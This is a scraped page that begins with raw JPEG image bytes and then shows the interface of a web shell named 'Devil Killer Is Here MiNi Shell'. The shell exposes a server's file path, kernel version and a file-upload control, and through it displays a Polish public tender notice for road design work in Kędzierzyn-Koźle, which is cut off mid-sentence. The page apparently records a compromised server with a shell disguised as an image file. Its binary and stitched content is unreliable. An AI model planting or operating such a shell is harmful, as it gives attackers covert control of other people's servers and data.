JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250915/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250915/0042354201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej dla drogi powiatowej nr 2064 O ul. Powstańców w K-Koźlu w ramach zadania pn. ,,Przebudowa infrastruktury drogowej w powiecie K-Kozielskim&#34; – II POSTĘPOWANIE. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWE CENTRUM USŁUG WSPÓLNYCH</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PCUW KK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366209564</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Konstantego Damrota 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cuwkk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.cuwkk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Powiatowe Centrum Usług Wspólnych</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 366209564</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Konstantego Damrota 30</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kędzierzyn-Koźle</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">47-220</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@cuwkk.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">bip.cuwkk.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej dla drogi powiatowej nr 2064 O ul. Powstańców w K-Koźlu w ramach zadania pn. ,,Przebudowa infrastruktury drogowej w powiecie K-Kozielskim&#34; – II POSTĘPOWANIE. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e3c5974-d9af-48f3-90b5-efd0245435bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00423542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041770/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wykonanie dokumentacji projektowych dotyczących dróg powiatowych Powiatu Kędzierzyńsko-Kozielskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl/Ogloszenia/Details/8147ec5b-22bf-4d6f-84ca-304bfabb1ab6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem: https://e-propublico.pl/Ogloszenia/Details/8147ec5b-22bf-4d6f-84ca-304bfabb1ab6</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl/Ogloszenia/Details/8147ec5b-22bf-4d6f-84ca-304bfabb1ab6 .<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie e-ProPublico. Użytkownikiem konta może być osoba prawna, osoba fizyczna lub jednostka organizacyjna nieposiadająca osobowości prawnej. Konto Wykonawcy założone na platformie powinno być zgodne z nazwą określoną w akcie rejestrowym firmy/podmiotu lub dokumentem tożsamości w przypadku osób fizycznych nieprowadzących działalności gospodarczej.<br/>3. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego.<br/>4. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy: a) stały dostęp do sieci Internet, b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera), e) włączona obsługa JavaScript oraz Cookies.<br/>5. Zamawiający dopuszcza następujący format przesyłanych danych:<br/>a) pliki w formatach określonych w załączniku nr 2 do Rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, przy czym zaleca się wykorzystywanie plików w formacie .pdf, .doc,.docx,.xls, .xlsx,<br/>b) w celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z,<br/>c) maksymalny rozmiar pojedynczego pliku to 150 MB, przy czym nie określa się limitu liczby plików, <br/>przy zachowaniu zapisów z pkt 17.8 SWZ.<br/>6. W postępowaniu, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są za pośrednictwem Platformy (karta „Wiadomości”). Wnioski o wyjaśnienie treści SWZ przekazać należy za pośrednictwem Platformy (karta „Zapytania/Wyjaśnienia”). Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przesłanych za pośrednictwem Platformy, przyjmuje się datę ich zamieszczenia na Platformie.<br/>7. Ofertę, wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem nieważności w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej podpisaną podpisem zaufanym lub podpisem osobistym, za pośrednictwem Platformy.<br/>8. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji , które Wykonawca chce zastrzec w prowadzonym postępowaniu przy składaniu ofert, jako tajemnicę przedsiębiorstwa, powinny zostać przesłane za pośrednictwem Platformy, w osobnym podpisanym pliku, na karcie „Oferta/Załączniki”, w tabeli „Część oferty stanowiąca tajemnicę przedsiębiorstwa”, za pomocą opcji „Załącz plik”. Plik z tajemnicą przedsiębiorstwa nie może być łączony z innymi plikami w jednym archiwum (zip) podpisywanym elektronicznie. Niespełnienie tych zasad zachowania<br/>poufności będzie skutkować uznaniem takich informacji za jawne.<br/>9. Nie zaleca się podpisywania folderu Archiwum (zip) zawierającego niepodpisane pliki – powinno nastąpić najpierw podpisanie plików, a potem ewentualnie spakowanie do zip.<br/>10. Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>Pełny opis wymagań technicznych zawarto w pkt. 17 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. Szczegółowe określenie zasad związanych z<br/>obowiązkiem informacyjnym RODO zawarto w rozdziale 33 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. Szczegółowe określenie zasad związanych z obowiązkiem informacyjnym RODO zawarto w rozdziale 33 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.262.63.2025.MS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest: Wykonanie dokumentacji projektowej dla drogi powiatowej nr 2064 O ul. Powstańców w Kędzierzynie-Koźlu w ramach zadania pn. ,,Przebudowa infrastruktury drogowej w powiecie Kędzierzyńsko-Kozielskim&#34; – II POSTĘPOWANIE.<br/>2.	Na przedmiot zamówienia składa się:<br/>1)	Wykonanie kompleksowej, wielobranżowej dokumentacji projektowo-kosztorysowej o charakterystycznych parametrach – danych wyjściowych do projektowania jak wyszczególniono poniżej:<br/>•	długość odcinka objętego projektem: około 1 100 m (początek: skrzyżowanie z ul. Konstantego Damrota, koniec: wyznacza zjazd na działkę nr 1210/22, obręb Kędzierzyn);<br/>•	droga publiczna, powiatowa, jednojezdniowa klasy Z, przekrój 1x2;<br/>•	prędkość dopuszczalna 50 km/h, teren zabudowany, płaski.<br/>2)	Stan istniejący: Ulica Powstańców w Kędzierzynie-Koźlu zlokalizowana w terenie płaskim, obsługuje ruch lokalny i gospodarczy związany z funkcjami zamieszkania na osiedlu Śródmieście, w tym prowadzi do zakładów pracy, apteki, dwóch przychodni zdrowia, żłobka, Domu Dziennego Pobytu Nr 1, skupu złomu. W bezpośrednim sąsiedztwie drogi nie są zlokalizowane instytucje istotne dla sprawnej realizacji zadań państwa o kluczowym znaczeniu dla bezpieczeństwa obywateli, a droga nie stanowi elementu trasy wyprowadzenia części ruchu pojazdów z terenu zwartej zabudowy.<br/>•	Klasa drogi: Z;<br/>•	Długość ewidencyjna: 1 100,0 m;<br/>•	Szerokość jezdni: zmienna 6,0÷8,0 m;<br/>•	Nr drogi publicznej powiatowej: 2064 O;<br/>•	Nawierzchnia: bitumiczna;<br/>•	Działki objęte zagospodarowaniem (obecnie) pasa drogowego:<br/>985/11 – Plac Wolności, 985/9 – droga od skrzyżowania z ul. Konstantego Damrota do skrzyżowania z ul. Karola Miarki, 1108 – wąski pas pomiędzy węzłem z ul. Pawła Stalmacha a węzłem z ul. Karola Miarki, 905/12 – skrzyżowanie z ul. Karola Miarki, 1122/1 – droga od skrzyżowania z ul. Karola Miarki do pkt 1+002.<br/>3.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej w zakresie:<br/>1)	przebudowy drogi powiatowej nr 2064 O ul. Powstańców w Kędzierzynie-Koźlu od skrzyżowania z drogą powiatową nr 2043 O (ul. Konstantego Damrota w Kędzierzynie-Koźlu do km 0+995 o szerokości pasa ruchu zmiennej 3,0÷4,0 m (wraz z przyległymi parkingami zlokalizowanymi w ciągu drogi na odcinku o jednym kierunku ruchu; należy zaprojektować zwiększenie liczby miejsc parkingowych) do szerokości docelowej pasa ruchu o wartości 3,0m. Dopuszczalne są zmiany charakterystycznych parametrów drogi w zakresie niewymagającym zmiany granic pasa drogowego;<br/>2)	odwodnienia – istniejąca kanalizacja z kolektorem deszczowym w zaniku ze studzienkami i wpustami ulicznymi w jezdni – wymagana wymiana na nowe i regulacja oraz uzgodnienie wymiany kolektora z gestorem infrastruktury: Miejskimi Wodociągami i Kanalizacją w Kędzierzynie-Koźlu;<br/>3)	przebudowy istniejących jednostronnych i dwustronnych chodników / budowy chodnika i dostosowanie ich do szerokości nie mniejszej niż 1,8 m z zastosowaniem odcinkowego pasa buforowego przylegającego do chodnika od strony jezdni;<br/>4)	inwentaryzacji drzew i krzewów w istniejącym i docelowym pasie drogowym;<br/>5)	przebudowy istniejących przejść dla pieszych (dopuszcza się zaprojektowanie przejść wyniesionych) oznakowanych aktywnie, w tym budowy nowego przejścia dla pieszych na wysokości II Liceum Ogólnokształcącego im. Mikołaja Kopernika w Kędzierzynie-Koźlu po uzgodnieniu lokalizacji z właściwym zarządcą drogi (Zarząd Powiatu Kędzierzyńsko-Kozielskiego reprezentowany przez Kierownika Wydziału Infrastruktury Drogowej Starostwa Powiatowego w Kędzierzynie-Koźlu). Przy przejściach dla pieszych należy zastosować system informacji fakturowej – dostosowanie dla osób z niepełnosprawnościami (kostka integracyjna);<br/>6)	przejścia dla pieszych oświetlone w systemie standardowym z istniejącej sieci energetycznej. Oświetlenie zgodnie z rekomendowanymi przez Ministerstwo Infrastruktury „Wytycznymi projektowania infrastruktury dla pieszych. Część 4: Projektowanie oświetlenia przejść dla pieszych (WR-D-41-4)” z lipca 2018 r. do pobrania np. ze strony:<br/>https://www.malopolska.uw.gov.pl/doc/Projektowanie%20o%C5%9Bwietlenia%20przej%C5%9Bc%20dla%20pieszych%20WR-D-41-4.pdf ;<br/>7)	wszystkie rozwiązania techniczne przyjęte w dokumentacji stanowiącej przedmiot zamówienia muszą spełniać warunki Rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych (Dz.U. 2022 poz. 1518).<br/>4.	Szczegółowy zakres wykonania projektu obejmuje:<br/>1)	opracowanie aktualnej mapy sytuacyjno-wysokościowej do celów projektowych, w tym projektu zagospodarowania terenu w skali 1:500 lub 1:1000 opracowanego (w przypadku gdy zamierzenie budowlane będzie wymagało dokonania zgłoszenia robót właściwemu organowi administracji architektoniczno-budowlanej) na mapie zasadniczej (dopuszcza się mapy nieaktualizowane). Na mapie zagospodarowania terenu należy wskazać linie rozgraniczające pas drogowy zgodne z obowiązującym mpzp. Na projekcie zagospodarowania terenu należy wyszczególnić odcinki jednorodne pod względem przekroju poprzecznego tak, aby można było określić ich długość i szerokość w przyjętym pikietażu;<br/>2)	opracowanie projektu architektoniczno-budowlanego i projektu zagospodarowania terenu dla branży drogowej (z zastrzeżeniem jak wyżej, w tym przekroje konstrukcyjne charakterystyczne oraz profil podłużny drogi), ewentualnie projektów branżowych (elektrycznego, teletechnicznego, w zakresie sieci gazowej). Projekt należy wykonać w 5 egzemplarzach w formie papierowej oraz w 1 egzemplarzu na nośniku CD lub DVD w formie elektronicznej w plikach z rozszerzeniem *.dwg (pliki graficzne), *.doc (część opisowa) oraz *.pdf (całość) – w wersji niepodpisanej i podpisanej podpisem kwalifikowanym elektronicznym;<br/>3)	przedmiary robót, kosztorysy inwestorskie i specyfikacje techniczne wykonania i odbioru robót:<br/>a)	przedmiary robót i kosztorysy inwestorskie należy wykonać w 2 egzemplarzach w formie papierowej oraz w 1 egzemplarzu na nośniku CD lub DVD w formie elektronicznej edytowalnej (*.doc lub *.xlsx) i w plikach *.pdf (w wersji niepodpisanej i podpisanej podpisem kwalifikowanym elektronicznym), opracowanych w sposób zgodny z ustawą Prawo zamówień publicznych (t.j. Dz.U. 2024 poz. 1320), tzn. bez używania nazw własnych, a jedynie za pomocą odpowiedniego opisu parametrów precyzujących rodzaj, standard itp.;<br/>b)	opracowanie szczegółowych specyfikacji technicznych wykonania i odbioru robót budowlanych, w 2 egzemplarzach w wersji papierowej i 1 egzemplarzu na nośniku CD lub DVD w wersji elektronicznej edytowalnej (*.doc lub *.xlsx) i w plikach *.pdf. (w wersji niepodpisanej i podpisanej podpisem kwalifikowanym elektronicznym);<br/>4)	przygotowanie wniosku wraz z niezbędnymi załącznikami i uzyskanie decyzji pozwolenia na budowę zgodnie z zapisami ustawy Prawo budowlane lub dokonanie zgłoszenia właściwemu organowi administracji architektoniczno-budowlanej wykonywania robót budowlanych wraz z uzyskaniem zaświadczenia organu administracji architektoniczno-budowlanej o niewniesieniu sprzeciwu wobec złożonego zgłoszenia, wydanego na podstawie art. 30 ust. 5 lub ust. 5aa ustawy Prawo budowlane;<br/>5)	przygotowanie materiałów i wniosków na decyzje (wraz z uzyskaniem tych decyzji) i opracowania towarzyszące np. operaty wodno-prawne (pozwolenie wodnoprawne), karta informacyjna przedsięwzięcia i decyzja o środowiskowych uwarunkowaniach – jeśli będą wymagane i ustalone na etapie prowadzenia prac projektowych;<br/>6)	opracowanie projektu docelowej stałej organizacji ruchu wraz z uzyskaniem stosownych opinii i zatwierdzenia. Rekomenduje się zastosowanie urządzeń bezpieczeństwa ruchu drogowego w tym oznakowania aktywnego na przejściach dla pieszych lub innych środków zarządzania prędkością zgodnie z „Wytycznymi zarządzania prędkością na drogach samorządowych”, Kraków/Gdańsk z października 2016 r. do pobrania np. ze strony: Wytyczne-zarzadzania-predkoscia-na-drogach-samorzadowych_cz_I.pdf;<br/>7)	opracowanie projektu wykonawczego w zakresie niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego oraz informacji i danych służących do przygotowania postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy robót budowlanych drogowych. Projekt należy wykonać w 3 egzemplarzach w formie papierowej oraz w 1 egzemplarzu na nośniku CD lub DVD w formie elektronicznej w plikach z rozszerzeniem *.dwg (pliki graficzne), *.doc (część opisowa) oraz *.pdf (całość) – w wersji niepodpisanej i podpisanej podpisem kwalifikowanym elektronicznym.<br/>8)	Ponadto Wykonawca będzie pełnił nadzór autorski do dnia odbioru końcowego robót budowlanych wykonanych na podstawie przedmiotu umowy, która zostanie zawarta z Wykonawcą w wyniku niniejszego postepowania.<br/>Pełny opis przedmiotu zamówienia, dodatkowe uwarunkowania przedmiotu zamówienia, założenia ogólne do projektowania i wykonania przedmiotu zamówienia oraz dodatkowe wymagania określono w pkt 5 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71223000-7 - Usługi architektoniczne w zakresie rozbudowy obiektów budowlanych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">250 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Zamawiający będzie oceniał oferty według następujących 